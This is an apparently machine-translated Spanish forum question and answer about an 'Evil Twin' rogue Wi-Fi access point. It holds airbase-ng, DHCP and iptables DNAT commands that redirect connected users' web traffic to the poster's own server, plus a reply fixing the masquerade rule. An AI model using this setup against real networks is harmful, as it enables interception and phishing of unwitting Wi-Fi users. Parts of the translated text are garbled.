Problema de iptables en Evil Twin

Problema de iptables en Evil Twin

He estado investigando el método Evil Twin y encontré estos pasos:

  1. Creando AP

    airmon-ng start wlan0 
    airbase-ng -e PrivateWIFI -c 9 -v mon0
    
  2. at0Configuración

    ifconfig at0 up
    ifconfig at0 192.168.1.20 netmask 255.255.255.0
    route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.20
    
  3. Ejecute DHCP

    echo > '/var/lib/dhcp/dhcpd.leases'
    
    /etc/init.d/isc-dhcp-server start OR dhcpd -d -f -cf /etc/dhcp/dhcpd.conf at0 ( the both of them is working fine )
    

Archivo dhcpd.conf:

ddns-update-style interim;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.0 netmask 255.255.255.0 {
    option subnet-mask 255.255.255.0;
    option broadcast-address 192.168.1.255;
    option routers 192.168.1.1;
    option domain-name-servers 8.8.8.8;
    range 192.168.1.2 192.168.1.250;
}

y luego inicié mi servidor apache2

(Hasta aquí no hay problema)

Estado (puedo abrir mi servidor web 192.168.1.20 desde mi teléfono y ver la página web que he creado :) :))

Pero el problema es que cuando agrego comandos de iptables no pasa nada:

iptables --flush
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.1.20:80
iptables -t nat -A POSTROUTING -j MASQUERADE
echo "1" > /proc/sys/net/ipv4/ip_forward

////////////////////////////////////////////////////////////////////////

iptables --flush
iptables --table nat --append POSTROUTING --out-interface at0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.1.20:80
iptables -t nat -A PREROUTING -p tcp --dport 8080 -j DNAT --to-destination 192.168.1.20:80
iptables -t nat -A POSTROUTING -j MASQUERADE
echo "1" > /proc/sys/net/ipv4/ip_forward

Ninguno de los dos funciona, ojalá alguien pudiera ayudarme.

Respuesta1

No sé si el problema es que tu navegador está siendo redirigido al servidor web o si no accede a Internet, pero veo algo que deberías solucionar.

Deberías tener sólounointerfaz enmascarada, no dos. El correcto eseth0(asumiendo que es la única interfaz que estádirectamenteconectado a Internet), no elred corrupta en0interfaz. Por lo tanto, debes eliminar esa penúltima línea.

Una vez dicho esto, vea si las cosas funcionan como espera. De lo contrario, proporciónenos una descripción precisa de su problema junto con su diagnóstico actual.

Atentamente.

información relacionada